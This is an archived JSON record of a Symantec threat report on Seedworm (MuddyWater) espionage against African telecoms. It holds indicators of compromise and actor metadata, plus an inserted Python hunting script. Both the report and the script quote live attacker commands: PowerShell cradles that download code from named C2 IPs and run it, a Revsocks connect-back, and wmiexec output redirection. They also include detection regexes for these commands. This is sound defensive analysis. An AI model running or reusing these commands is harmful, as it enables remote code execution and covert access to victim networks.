{
	"id": "804599bc-54c7-480e-a3b9-d4cbc69aa8af",
	"created_at": "2026-04-06T00:10:54.865386Z",
	"updated_at": "2026-04-10T03:34:22.584459Z",
	"deleted_at": null,
	"sha1_hash": "8e14048ed30537f0e773f766bbe394f290574eea",
	"title": "Seedworm: Iranian Hackers Target Telecoms Orgs in North and East Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62364,
	"plain_text": "Seedworm: Iranian Hackers Target Telecoms Orgs in North and East Africa\r\nArchived: 2026-04-05 12:46:48 UTC\r\nIranian espionage group Seedworm (aka MuddyWater) has been targeting organizations operating in the telecommunications\r\nsector in Egypt, Sudan, and Tanzania.\r\nSeedworm has been active since at least 2017 and has targeted organizations in many countries, though it is most strongly\r\nassociated with attacks on organizations in the Middle East. It has been publicly stated that Seedworm is a cyberespionage\r\ngroup believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).\r\nThe attackers used a variety of tools in this activity, which occurred in November 2023, including the\r\nMuddyC2Go infrastructure recently discovered and documented by Deep Instinct. Researchers on Symantec’s\r\nThreat Hunter Team, part of Broadcom, found a MuddyC2Go PowerShell launcher in the activity we investigated.\r\nThe attackers also used the SimpleHelp remote access tool and Venom Proxy, both of which have previously been associated with\r\nSeedworm activity, as well as a custom keylogging tool and other publicly available and living-off-the-land tools.\r\nAttack Chain\r\nThe attacks in this campaign occurred in November 2023. Most of the activity we observed took place at one\r\ntelecommunications organization. The first evidence of malicious activity was a series of PowerShell executions related to the\r\nMuddyC2Go backdoor.\r\nA MuddyC2Go launcher named “vcruntime140.dll” was saved in the folder “csidl_common_appdata\\javax” and appears\r\nto have been sideloaded by jabswitch.exe. 
Jabswitch.exe is a legitimate Java Platform SE 8 executable.\r\nThe MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C\u0026C) server:\r\ntppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;$tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjw=\"http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf\";$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop -usebasicparsing;iex $response.Content;\r\nThe long token and variable at the beginning of the code are never used; they appear to be padding intended to defeat signature-based detection by\r\nsecurity software.\r\nRight after this execution, the attackers launched the MuddyC2Go malware using a scheduled task that had previously been\r\ncreated:\r\n\"CSIDL_SYSTEM\\schtasks.exe\" /run /tn \"Microsoft\\Windows\\JavaX\\Java Autorun\"\r\nThe attackers also used commands typical of the Impacket WMIExec hacktool, which redirects command output to a file on the ADMIN$ share whose name is built from a Unix timestamp:\r\ncmd.exe /Q /c cd \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__1698662615.0451615 2\u003e\u00261\r\nThe SimpleHelp remote access tool was also leveraged, connecting to the 146.70.124[.]102 C\u0026C server. Further PowerShell\r\nstager execution also occurred, and the attacker executed the Revsocks tool:\r\nCSIDL_COMMON_APPDATA\\do.exe -co 94.131.3.160:443 -pa super -q\r\nThe attackers also used a second legitimate remote access tool, AnyDesk, which was deployed on the same computer as\r\nRevsocks and SimpleHelp, while PowerShell executions related to MuddyC2Go also occurred on the same machine:\r\n$uri =\"http://45.150.64.39:443/HJ3ytbqpne2tsJTEJi2D8s0hWo172A0aT\";$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop -usebasicparsing;iex $response.Content;\r\nNotably, this organization is believed to have previously been infiltrated by Seedworm earlier in 2023. 
The primary activity\r\nof note during that intrusion was extensive use of SimpleHelp to carry out a variety of actions, including:\r\nLaunching PowerShell\r\nLaunching a proxy tool\r\nDumping SAM hives\r\nUsing WMI to get drive info\r\nInstalling the JumpCloud remote access software\r\nDelivering proxy tools, a suspected LSASS dump tool, and a port scanner.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\r\nPage 1 of 3\n\nDuring that intrusion, it is believed the attackers used WMI to launch the SimpleHelp installer on the victim network. At the\r\ntime, this activity could not be definitively linked to Seedworm, but the subsequent activity indicates that the earlier\r\nintrusion was carried out by the same group of attackers.\r\nIn another telecommunications and media company targeted by the attackers, SimpleHelp was used on multiple occasions to\r\nconnect to known Seedworm infrastructure. A custom build of the Venom Proxy hacktool was also executed on this network,\r\nas was the new custom keylogger used by the attackers in this activity.\r\nIn the third organization targeted, Venom Proxy was also used, in addition to AnyDesk and suspicious Windows Script\r\nFiles (WSF) that have been associated with Seedworm activity in the past.\r\nToolset\r\nThe most interesting part of the toolset used in this activity is probably the presence of the MuddyC2Go launcher, which was\r\nsideloaded by jabswitch.exe.\r\nThe malware reads the C\u0026C URL from the Windows registry value “End” stored inside the key\r\n“HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip”. 
The URL path is read from the “Status” value in the same key.\r\nLastly, the MuddyC2Go launcher executes the following PowerShell command to contact its C\u0026C server and execute the\r\nPowerShell code received:\r\npowershell.exe -c $uri ='{C2_URI}';$response = Invoke-WebRequest -UseBasicParsing -Uri $uri -Method GET -ErrorAction Stop;Write-Output $response.Content;iex $response.Content;\r\nThe MuddyC2Go framework was first publicly written about in a blog published by Deep Instinct researchers on November\r\n8, 2023. That blog documented its use in attacks on organizations in countries in the Middle East. The researchers said the\r\nframework may have been used by Seedworm since 2020. They also said that the framework, which is written in Go, has\r\nreplaced Seedworm’s previous PhonyC2 C\u0026C infrastructure. This replacement appears to have occurred after the PhonyC2\r\nsource code was leaked earlier in 2023. The full capabilities of MuddyC2Go are not yet known, but the executable contains\r\nan embedded PowerShell script that automatically connects to Seedworm’s C\u0026C server, which eliminates the need for\r\nmanual execution by an operator and gives the attackers remote access to a victim machine. Deep Instinct said it was able to\r\nlink MuddyC2Go to attacks dating back to 2020 due to the unique URL patterns generated by the framework. It also said\r\nthat the MuddyC2Go servers it observed were hosted at “Stark Industries”, a VPS provider that is known to host\r\nmalicious activity.\r\nOther tools of note used in this activity included SimpleHelp, a legitimate remote device control and management\r\ntool, which was used for persistence on victim machines. SimpleHelp is believed to have been used in attacks carried out by Seedworm since\r\nat least July 2022. 
Once installed on a victim device, SimpleHelp runs persistently as a system service, which gives\r\nattackers access to the user’s device at any point in time, even after a reboot. SimpleHelp also allows\r\nattackers to execute commands on a device with administrator privileges. SimpleHelp is now strongly associated with\r\nSeedworm activity, and the tool is installed on several of Seedworm’s servers.\r\nVenom Proxy is a publicly available tool that is described as “a multi-hop proxy tool developed for penetration testers.” It is\r\nwritten in Go. It can be used to proxy network traffic into a multi-layer intranet and to manage intranet nodes. It has\r\nbeen associated with Seedworm since at least mid-2022, with Microsoft describing it as Seedworm’s “tool of choice” in an\r\nAugust 2022 blog. Seedworm tends to use a custom build of Venom Proxy in its activity.\r\nOther tools used in this activity include:\r\nRevsocks - A cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a\r\nfirewall.\r\nAnyDesk - A legitimate remote desktop application. It and similar tools are often used by attackers to obtain remote\r\naccess to computers on a network.\r\nPowerShell - Seedworm makes heavy use of PowerShell, as well as PowerShell-based tools and scripts, in its attacks.\r\nPowerShell is a Microsoft scripting tool that can be used to run commands, download payloads, traverse\r\ncompromised networks, and carry out reconnaissance.\r\nCustom keylogger\r\nConclusion\r\nSeedworm has long had an interest in telecommunications organizations, as do many groups engaged in cyberespionage\r\nactivities. 
However, its strong focus on African organizations in this campaign is notable: while it has been known to\r\ntarget organizations in Africa in the past, it generally focuses primarily on organizations in countries in the Middle East.\r\nThat one of the victim organizations in this campaign is based in Egypt is also of note given Egypt’s proximity to Israel, a\r\nfrequent target of Seedworm.\r\nSeedworm appears to remain focused on using a wide array of living-off-the-land and publicly available tools in its attack\r\nchains, no doubt in an effort to remain undetected on victim networks for as long as possible. However, its recent wider\r\nadoption of new C\u0026C infrastructure in the form of MuddyC2Go is notable and shows that the group continues to innovate\r\nand develop its toolset when required in order to keep its activity under the radar. While the group uses a lot of living-off-the-land and publicly available tools, it is also capable of developing its own custom tools, such as the custom build of\r\nVenom Proxy and the custom keylogger used in this campaign. The group still makes heavy use of PowerShell and\r\nPowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on\r\ntheir networks.\r\nThe activity observed by Symantec’s Threat Hunter Team took place in November 2023, showing that Seedworm is very\r\nmuch a currently active threat faced by organizations that may be of strategic interest to Iranian threat actors.
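Acting on that last point, here is an added hunting example written for this page (it is not code from Symantec or from the report). It encodes the command lines quoted in the Attack Chain section and the registry-based C2 configuration described under Toolset, and runs them over constructed sample process-creation events. The C2 addresses are the network indicators listed below; the host and image names, the event layout and the split of the MuddyC2Go URL into the End (base) and Status (path) values are assumptions.

```python
import re
from urllib.parse import urlparse

# Added hunting example for this page (not code from the Symantec report).
# It encodes the command lines and the registry-based C2 configuration the
# report describes and runs them over constructed sample events.
BS = chr(92)  # one backslash, kept out of literals so the snippet copies cleanly
Q = chr(34)   # one double quote

# Network indicators as published in the report (defanged).
REPORT_NETWORK_IOCS = [
    '146.70.124[.]102', '94.131.109[.]65', '95.164.38[.]99', '45.67.230[.]91',
    '45.150.64[.]39', '95.164.46[.]199', '94.131.98[.]14', '94.131.3[.]160',
]

def refang(indicator):
    'Turn 1.2.3[.]4 or 1.2.3(.)4 back into 1.2.3.4 so it can be compared with live data.'
    return indicator.replace('[.]', '.').replace('(.)', '.')

KNOWN_C2 = {refang(i) for i in REPORT_NETWORK_IOCS}

# MuddyC2Go launcher cradle: Invoke-WebRequest whose response body is fed to iex.
CRADLE = re.compile(r'Invoke-WebRequest.*(iex|Invoke-Expression)', re.I)
VAR_TOKEN = re.compile(r'[$]([A-Za-z_][A-Za-z0-9_]*)')
VAR_ASSIGN = re.compile(r'[$]([A-Za-z_][A-Za-z0-9_]*)[ ]*=[^=]')
URL_RE = re.compile(r'https?://[0-9A-Za-z.-]+(:[0-9]+)?/[0-9A-Za-z]*')
# Impacket wmiexec redirects output to the ADMIN$ share under a name built from a Unix timestamp.
WMIEXEC = re.compile('ADMIN[$]' + BS + BS + '__[0-9]{10}[.][0-9]+')
# The scheduled task the launcher was started from.
TASK_RUN = re.compile(r'schtasks([.]exe)?[^ ]*[ ]+/run[ ]+/tn[ ]+.*JavaX', re.I)
# Revsocks connect-back: -co host:port -pa <password>.
REVSOCKS = re.compile(r'-co[ ]+([0-9.]+):[0-9]+[ ]+-pa[ ]+[^ ]+', re.I)


def analyze_command_line(cmdline):
    'Return the detection tags that fire on one process command line.'
    tags = []
    if CRADLE.search(cmdline):
        tags.append('powershell-download-cradle')
        assigned = set(VAR_ASSIGN.findall(cmdline))
        used = VAR_TOKEN.findall(cmdline)
        # A variable assigned once and never read again is the padding the report notes.
        if any(used.count(name) == 1 for name in assigned):
            tags.append('unused-variable-padding')
    for m in URL_RE.finditer(cmdline):
        host = urlparse(m.group(0)).hostname
        if host in KNOWN_C2:
            tags.append('known-c2:' + host)
    if WMIEXEC.search(cmdline):
        tags.append('impacket-wmiexec-output-redirect')
    if TASK_RUN.search(cmdline):
        tags.append('javax-scheduled-task-run')
    m = REVSOCKS.search(cmdline)
    if m:
        tags.append('reverse-socks-connect-back')
        if m.group(1) in KNOWN_C2:
            tags.append('known-c2:' + m.group(1))
    return tags


def muddyc2go_url_from_tcpip_values(values):
    'values: {name: data} from the Tcpip service key; End holds the C2 URL, Status the path.'
    base, path = values.get('End'), values.get('Status')
    if not isinstance(base, str) or not isinstance(path, str):
        return None  # neither value belongs in a normal Tcpip service key (assumption of this check)
    if not base.lower().startswith(('http://', 'https://')):
        return None
    return base.rstrip('/') + '/' + path.lstrip('/')  # joining base and path is an assumption


def scan(events):
    'Run the command-line checks over process-creation events; return (host, image, tags) hits.'
    hits = []
    for ev in events:
        tags = analyze_command_line(ev['cmdline'])
        if tags:
            hits.append((ev['host'], ev['image'], tags))
    return hits


# Constructed sample events; the command lines are the ones quoted in the report.
SAMPLE_EVENTS = [
    {'host': 'telco-ws01', 'image': 'jabswitch.exe', 'cmdline':
     'tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;'
     '$tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjw=' + Q +
     'http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf' + Q +
     ';$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop -usebasicparsing;iex $response.Content;'},
    {'host': 'telco-ws01', 'image': 'schtasks.exe', 'cmdline':
     Q + 'CSIDL_SYSTEM' + BS + 'schtasks.exe' + Q + ' /run /tn ' + Q +
     BS.join(['Microsoft', 'Windows', 'JavaX', 'Java Autorun']) + Q},
    {'host': 'telco-ws01', 'image': 'cmd.exe', 'cmdline':
     'cmd.exe /Q /c cd ' + BS + ' 1> ' + BS + BS + '127.0.0.1' + BS + 'ADMIN$' + BS + '__1698662615.0451615 2>&1'},
    {'host': 'telco-ws01', 'image': 'do.exe', 'cmdline':
     'CSIDL_COMMON_APPDATA' + BS + 'do.exe -co 94.131.3.160:443 -pa super -q'},
    {'host': 'telco-ws01', 'image': 'powershell.exe', 'cmdline':
     '$uri =' + Q + 'http://45.150.64.39:443/HJ3ytbqpne2tsJTEJi2D8s0hWo172A0aT' + Q +
     ';$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop -usebasicparsing;iex $response.Content;'},
    {'host': 'telco-ws02', 'image': 'powershell.exe', 'cmdline':
     'powershell.exe -c Get-ChildItem C:' + BS + 'Users | Measure-Object'},
    {'host': 'telco-ws02', 'image': 'powershell.exe', 'cmdline':
     'powershell.exe -c Invoke-WebRequest -Uri https://www.example.com/tool.zip -OutFile tool.zip'},
]

# Constructed Tcpip service values on an infected host (End/Status split is an assumption).
TCPIP_VALUES_INFECTED = {'Start': 1, 'Type': 1, 'End': 'http://95.164.38.99:443',
                         'Status': 'HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf'}

if __name__ == '__main__':
    for host, image, tags in scan(SAMPLE_EVENTS):
        print(host, image, tags)
    print('registry C2 URL:', muddyc2go_url_from_tcpip_values(TCPIP_VALUES_INFECTED))
```

The checks match the shape of the command line rather than the specific C2 strings, so a cradle that fetches a URL absent from the indicator list still fires; the known-c2 tag is added only when the host is one the report names. Feed the script your own process-creation events (Sysmon event ID 1, or Windows 4688 with command-line auditing enabled) as dicts with host, image and cmdline fields, and compare the URL returned by muddyc2go_url_from_tcpip_values against KNOWN_C2 before escalating.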
\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nFile Indicators\r\n1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca – MuddyC2Go DLL launcher\r\n25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a – Benign Java(TM) Platform SE 8 executable\r\nused for sideloading the MuddyC2Go DLL\r\neac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f – Custom keylogger\r\n3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230 – Venom Proxy\r\nNetwork Indicators\r\n146.70.124[.]102 – SimpleHelp C\u0026C server\r\n94.131.109[.]65 – MuddyC2Go C\u0026C server\r\n95.164.38[.]99 – MuddyC2Go C\u0026C server\r\n45.67.230[.]91 – MuddyC2Go C\u0026C server\r\n45.150.64[.]39 – MuddyC2Go C\u0026C server\r\n95.164.46[.]199 – MuddyC2Go C\u0026C server\r\n94.131.98[.]14 – MuddyC2Go C\u0026C server\r\n94.131.3[.]160 – GoSOCKS5proxy C\u0026C server\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms"
	],
	"report_names": [
		"iran-apt-seedworm-africa-telecoms"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434254,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8e14048ed30537f0e773f766bbe394f290574eea.pdf",
		"text": "https://archive.orkl.eu/8e14048ed30537f0e773f766bbe394f290574eea.txt",
		"img": "https://archive.orkl.eu/8e14048ed30537f0e773f766bbe394f290574eea.jpg"
	}
}